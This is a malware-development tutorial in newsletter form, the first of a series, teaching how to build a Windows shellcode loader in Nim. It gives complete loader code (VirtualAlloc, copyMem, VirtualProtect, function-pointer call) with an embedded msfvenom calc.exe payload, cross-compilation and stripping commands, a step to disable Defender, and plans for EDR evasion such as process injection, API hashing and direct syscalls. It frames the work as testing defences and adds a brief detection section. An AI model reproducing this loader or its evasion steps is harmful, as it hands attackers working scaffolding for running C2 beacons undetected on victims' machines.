Intro to Maldev with Nim

This will be the first of a series on building shellcode loaders with Nim. In this one we’ll talk about the basics of a shellcode loader and give you everything you need to get started. We’ll add evasion techniques, process injection, and tighten OPSEC over the next several issues.

Why Maldev?

If we really want to defend an environment, we have to test its controls. Default settings are rarely secure, and the EDR and AV products we rely on are often running in a near-default state. Also, maldev is fun. Learning the Windows API without the goal of getting past an EDR would be impossibly boring. I’ll show you the basics here. Nothing in this issue should get past an EDR on its own without more work. Defender by itself isn’t an EDR, though, and you can get a lot past it with little effort just by obfuscating or encrypting your payload before executing it.

Why Nim?

What first brought me to Nim was the name. I thought it was cool and it reminded me of the Rats of NIMH, but there is no relation. It's extremely portable with mingw. I compile Windows binaries from Nim on every platform. The syntax reminds me of Python and it isn't overly verbose.

Shellcode Loaders

A shellcode loader is a tiny program whose only job is to execute shellcode. You’re gonna want one of these when you can execute code on a target. That could be through a maldoc, a trojan, or an exploit. The shellcode you use is typically a C2 beacon from Cobalt Strike, Sliver, or a similar framework. These beacons are heavily signatured, so if you write them to disk or they get scanned in memory, you’re gonna fire alerts. The art of shellcode loaders is executing the shellcode in memory without alerting the EDR. We’re going to go over a simple one here in Nim.

import winim/lean

# Replace with your own payload. Generate one with:
#   msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin
#   xxd -i sc.bin
# Placeholder below is a single `ret` so the program exits cleanly.
const shellcode: array[1, byte] = [0xC3.byte]

We have some basic Nim code that will take shellcode from Metasploit and execute it. The first important thing to note is the winim library. It provides Nim bindings for the Windows API, which is why we can call the API so easily. Importing winim/lean pulls in only the core Windows SDK definitions and leaves out the shell, OLE, and COM modules, which also keeps compile times down.

The shellcode is a placeholder with a single ret. Metasploit can generate raw position-independent shellcode, so we can use it. However, you can’t just copy paste a PE binary into the code. The payload needs to be shellcode that can execute from wherever it lands in memory.

proc main() =
    # 1. Allocate a region of memory we can write to.
    let mem = VirtualAlloc(
        nil,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT or MEM_RESERVE,
        PAGE_READWRITE
    )
    if mem == nil:
        echo "alloc failed: ", GetLastError()
        return

Our first step is to allocate some memory with the VirtualAlloc WinAPI call. VirtualAlloc is how we get Windows to give us a region of memory in our own process. It hands us a pointer to a mapped region we control.

The arguments:

nil - the address we want. Our loader doesn’t care where the memory lands, so we let Windows pick.
shellcode.len - how many bytes we need to hold our shellcode. Windows rounds this up to a whole number of pages, and a page is 4 KB on x86 and x64.
MEM_COMMIT or MEM_RESERVE - Windows allocates memory in two steps: reserving a range of address space, then committing it so it’s actually usable. Passing both flags does both in one call.
PAGE_READWRITE - the protection we want on the page. We need to write the shellcode bytes into it. After the copy, we’ll flip it to executable.
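
The rounding described for the size argument is plain integer arithmetic. Here is a minimal sketch, assuming the 4 KB page size of x86 and x64 Windows. roundUpToPage is a made-up helper name for illustration, not part of winim or the Windows API.

```nim
# Assumption: 4 KB pages, as on x86 and x64 Windows.
const pageSize = 4096

proc roundUpToPage(n: int): int =
    ## Round n up to the next multiple of pageSize (hypothetical helper).
    (n + pageSize - 1) div pageSize * pageSize

echo roundUpToPage(1)      # 4096
echo roundUpToPage(276)    # 4096
echo roundUpToPage(4097)   # 8192
```

So both the one-byte placeholder and a payload of a few hundred bytes end up occupying a single page.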

    # 2. Copy shellcode into the writable region.
    copyMem(mem, unsafeAddr shellcode[0], shellcode.len)

copyMem is Nim's wrapper around memcpy. It takes a destination pointer, a source pointer, and a byte count, and copies one to the other. The destination is the memory we just got from VirtualAlloc.
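
If the argument order is unfamiliar, it can help to try copyMem on ordinary data first. This is a small sketch with two plain arrays standing in for the shellcode and the allocated region. The names src and dst are only for illustration.

```nim
# Two ordinary arrays stand in for the shellcode and the allocated region.
var src = [byte 0xDE, 0xAD, 0xBE, 0xEF]
var dst: array[4, byte]

# Destination first, then source, then the number of bytes to copy.
copyMem(addr dst[0], addr src[0], src.len)

echo dst   # [222, 173, 190, 239]
```

Like memcpy, copyMem does no bounds checking, so the byte count has to fit inside both buffers.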

    # 3. Flip the page from RW to RX. Now executable, no longer writable.
    var oldProtect: DWORD
    if VirtualProtect(
        mem,
        cast[SIZE_T](shellcode.len),
        PAGE_EXECUTE_READ,
        addr oldProtect
    ) == 0:
        echo "VirtualProtect failed: ", GetLastError()
        return

VirtualProtect changes the protection on memory we already own. We point it at the region we got from VirtualAlloc, tell it the new protection should be PAGE_EXECUTE_READ (RX: readable and executable, no longer writable), and pass it the address of a DWORD to receive the old protection value. That last argument isn't optional: the call fails if we don't give it a valid variable, even if we never plan to use the result.
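
The protection values are just small integers, which is handy to know when one shows up in a debugger or a log line. The sketch below maps a few of the documented values back to their constant names. protectName is a hypothetical helper written for this example, and it only covers the handful of values relevant here.

```nim
proc protectName(p: uint32): string =
    ## Map a few common page-protection values to their constant names.
    case p
    of 0x02'u32: "PAGE_READONLY"
    of 0x04'u32: "PAGE_READWRITE"
    of 0x20'u32: "PAGE_EXECUTE_READ"
    of 0x40'u32: "PAGE_EXECUTE_READWRITE"
    else: "other"

echo protectName(0x04)   # PAGE_READWRITE
echo protectName(0x20)   # PAGE_EXECUTE_READ
```

In our loader, the old protection we get back should correspond to the first of those two lines, since that is what we asked VirtualAlloc for.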

    # 4. Cast the memory address to a function pointer and call it.
    let fn = cast[proc() {.cdecl.}](mem)
    fn()

main()

mem is the address of our shellcode. Casting it to a proc type lets us call it like any other function, and that call transfers execution to the shellcode.
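
The cast itself is not specific to shellcode. As a rough illustration, the same round trip works with a normal Nim proc: drop its type to get a raw pointer, then cast it back and call it. The proc name hello is only for this example.

```nim
proc hello() {.cdecl.} =
    echo "called through a raw pointer"

# Throw away the type information, as if we only had an address.
let raw = cast[pointer](hello)

# Cast it back to a callable proc type and invoke it.
let fn = cast[proc() {.cdecl.}](raw)
fn()
```

The compiler takes our word for it that the address holds code matching that signature, which is exactly the trust the loader relies on.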

Ok, now it’s time to build it. Since this is Nim, we can compile this anywhere.

For Windows:

nim c -d:release loader.nim

Cross-compiling from Linux or macOS

All we need to cross-compile is the mingw toolchain. With it installed, we pass -d:mingw and Nim builds for Windows targets.

# Ubuntu / Debian
sudo apt install mingw-w64

# macOS
brew install mingw-w64

# Cross-compile to Windows x64
nim c -d:mingw -d:release --cpu:amd64 loader.nim

Yay it works. Now let’s do something useful. Let’s generate calc.exe shellcode with msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin, then xxd -i sc.bin to get the C array form.

Putting it all together: shellcode loader with calc

import winim/lean


#   msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin
#   xxd -i sc.bin

const shellcode: array[276, byte] = [
byte 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00,
0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41,
0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67,
0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56,
0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24,
0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41,
0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83,
0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2,
0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c,
0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e,
0x65, 0x78, 0x65, 0x00
]


proc main() =
    # 1. Allocate RW only. No execute bit yet.
    let mem = VirtualAlloc(
        nil,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT or MEM_RESERVE,
        PAGE_READWRITE
    )
    if mem == nil:
        echo "alloc failed: ", GetLastError()
        return

    # 2. Copy shellcode into the writable region.
    copyMem(mem, unsafeAddr shellcode[0], shellcode.len)

    # 3. Flip the page to RX. Now executable, no longer writable.
    var oldProtect: DWORD
    if VirtualProtect(
        mem,
        cast[SIZE_T](shellcode.len),
        PAGE_EXECUTE_READ,
        addr oldProtect
    ) == 0:
        echo "VirtualProtect failed: ", GetLastError()
        return

    # 4. Cast and call.
    let fn = cast[proc() {.cdecl.}](mem)
    fn()

main()

Here we need to disable Defender first. The shellcode is detected exactly as msfvenom generates it, and Defender will eat our compiled binary.

And let’s change our compile options to make our executable smaller and strip out what we don’t need.

# Windows
nim c -d:danger -d:strip --opt:size --passC:-flto --passL:-flto loader.nim

# Linux & macOS
nim c -d:mingw -d:danger -d:strip --opt:size --passC:-flto --passL:-flto --cpu:amd64 loader.nim

-d:mingw - Use mingw to compile to Windows.
-d:danger - release build with all runtime checks (bounds, overflow, range) and assertions turned off.
-d:strip - strip debug info and symbol tables
--opt:size - optimize for binary size instead of speed
--passC:-flto - link-time optimization in the C compiler
--passL:-flto - link-time optimization in the linker, lets it drop unused code across compilation units
--cpu:amd64 - produce x64 output. Nim targets the host CPU by default, so it's omitted on a 64-bit Windows host. When cross-compiling it's worth setting explicitly, especially from a non-x64 host such as an Apple Silicon Mac, so we don't end up with a binary that won't run x64 shellcode
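
If you want to double-check which architecture a build actually targets, the answer is in the PE header. Below is a minimal sketch that reads the Machine field, assuming the standard PE layout (the e_lfanew offset at 0x3C, then the "PE" signature followed by the COFF header). The helper names le16, le32, and peMachine are made up for this example, and a synthetic header stands in for loader.exe so the sketch is self-contained.

```nim
proc le16(data: openArray[byte], off: int): int =
    ## Read a little-endian 16-bit value.
    int(data[off]) or (int(data[off + 1]) shl 8)

proc le32(data: openArray[byte], off: int): int =
    ## Read a little-endian 32-bit value.
    le16(data, off) or (le16(data, off + 2) shl 16)

proc peMachine(data: openArray[byte]): string =
    ## Report the target architecture recorded in a PE header.
    if data.len < 0x40 or data[0] != byte(ord('M')) or data[1] != byte(ord('Z')):
        return "not a PE"
    let peOff = le32(data, 0x3C)          # e_lfanew: offset of the PE signature
    if peOff + 6 > data.len:
        return "not a PE"
    if data[peOff] != byte(ord('P')) or data[peOff + 1] != byte(ord('E')) or
            data[peOff + 2] != 0 or data[peOff + 3] != 0:
        return "not a PE"
    case le16(data, peOff + 4)            # Machine field of the COFF header
    of 0x8664: "x64"
    of 0x014c: "x86"
    else: "other"

# Synthetic header: just enough bytes to look like an x64 PE.
var fake = newSeq[byte](0x48)
fake[0] = byte(ord('M')); fake[1] = byte(ord('Z'))
fake[0x3C] = 0x40                                    # e_lfanew
fake[0x40] = byte(ord('P')); fake[0x41] = byte(ord('E'))
fake[0x44] = 0x64; fake[0x45] = 0x86                 # 0x8664, little-endian
echo peMachine(fake)   # x64
```

To check a real build, one option is to load the file with readFile and pass its bytes in, for example via toOpenArrayByte.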

Once we’ve done that we can execute.

calc executes from loader.

Before we wrap up, run strings against the compiled binary:

gat0r@bast:/mnt/c/loader$ strings loader.exe | grep VirtualAlloc
VirtualAlloc
VirtualAlloc

VirtualAlloc shows up twice. PE binaries store imported function names in the import table by default. The OS loader needs them to resolve the actual addresses at process startup, so stripping doesn't touch them.
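
What strings piped into grep is doing here is simple enough to sketch: walk the raw bytes and count how often a name appears. The version below is a rough approximation for illustration, with a hypothetical helper name (countName) and a synthetic byte string standing in for the file contents.

```nim
proc countName(data, name: string): int =
    ## Count non-overlapping occurrences of name in data, byte by byte.
    if name.len == 0:
        return 0
    var i = 0
    while i + name.len <= data.len:
        if data[i ..< i + name.len] == name:
            inc result
            i += name.len
        else:
            inc i

# Synthetic bytes standing in for the contents of a binary.
let blob = "\x00\x01VirtualAlloc\x00junk\x00VirtualAlloc\x00VirtualProtect\x00"
echo countName(blob, "VirtualAlloc")     # 2
echo countName(blob, "VirtualProtect")   # 1
```

Nothing about this needs the binary to run, which is why plain-text API names are such an easy thing for static tooling to pick up.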

We can confirm with objdump:

gat0r@bast:/mnt/c/loader$ x86_64-w64-mingw32-objdump -p loader.exe | grep -A 20 "DLL Name: KERNEL32"
        DLL Name: KERNEL32.dll
        vma:  Hint/Ord Member-Name Bound-To
        2271c      20  AddVectoredExceptionHandler
        2273a     141  CloseHandle
        22748     197  CreateEventA
        22758     243  CreateSemaphoreA
        2276c     283  DeleteCriticalSection
        22784     313  DuplicateHandle
        22796     319  EnterCriticalSection
        227ae     443  FreeLibrary
        227bc     552  GetCurrentProcess
        227d0     553  GetCurrentProcessId
        227e6     556  GetCurrentThread
        227fa     557  GetCurrentThreadId
        22810     627  GetHandleInformation
        22828     630  GetLastError
        22838     651  GetModuleHandleA
        2284c     710  GetProcAddress
        2285e     711  GetProcessAffinityMask
        22878     743  GetStartupInfoA
        2288a     769  GetSystemTimeAsFileTime

objdump ships with binutils on Linux. On Windows you can use dumpbin /imports loader.exe from a Visual Studio command prompt, or pestudio if you prefer a GUI.

Most of those imports aren't from our code. We never called AddVectoredExceptionHandler, CreateSemaphoreA, or EnterCriticalSection. Those come from the Nim runtime, the bits Nim links into every compiled binary to handle threading, exceptions, and memory management. Even our small loader drags this whole import set along with it. A Nim binary's import table is a pretty distinctive fingerprint, and detection engineers have noticed.

This is what an analyst sees in the first 30 seconds of examining your binary. Tools like pestudio and CFF Explorer, along with most automated tools, lead with the import table, and the API names in it give away the behavior of the binary.

Hiding API names from static analysis is solvable. You can resolve them at runtime via LoadLibrary and GetProcAddress, or skip the names entirely with hash-based resolution. We'll get there in a future issue.

Detections & Mitigations

Defensive Tools & Detections:

YARA. Signatures targeting the embedded msfvenom shellcode stub will fire on the bytes sitting in the binary regardless of how we load them.
AV static scanning. Will flag known msfvenom payloads on disk before the loader ever runs, since the bytes are in the binary in plaintext.
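
To see why plaintext bytes are such an easy catch, here is a rough sketch of the core of a static signature: a search for a fixed byte pattern. It uses the first six bytes of the calc payload from this issue as the pattern. findPattern is a made-up helper, and real YARA rules and AV signatures use longer, more specific patterns than this.

```nim
proc findPattern(data, pat: openArray[byte]): int =
    ## Offset of the first occurrence of pat in data, or -1 if absent.
    result = -1
    if pat.len == 0 or pat.len > data.len:
        return
    for i in 0 .. data.len - pat.len:
        var hit = true
        for j in 0 ..< pat.len:
            if data[i + j] != pat[j]:
                hit = false
                break
        if hit:
            return i

# First six bytes of the calc payload shown earlier in this issue.
const stubPrefix = [byte 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8]

# Synthetic "file": some filler bytes followed by the start of the payload.
let sample = [byte 0x4d, 0x5a, 0x90, 0x00, 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0]
echo findPattern(sample, stubPrefix)   # 4
```

The scanner never needs the loader to run. It only needs the bytes to be sitting there unchanged.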

Alright, we’ve written a short shellcode loader that demonstrates the concepts needed to move forward. It will get flagged by Defender for the msfvenom payload. Even if it didn’t, the import table might give us away on static analysis. Next issue we’ll move out of our own process and run code in someone else’s with process injection. We’ll also encrypt or encode our payload so it isn’t immediately eaten. After that come suspended process targets, callback function abuse, Early Bird APC, and direct syscalls. Each issue will close off more detection paths, and by the end of the series we’ll have a loader and you’ll understand the OPSEC tradeoffs we make at each step.

If you found this useful, forward it to someone who’d actually read it.

Got questions, corrections, or want to argue about something? Just hit reply. I read everything.

— Jeff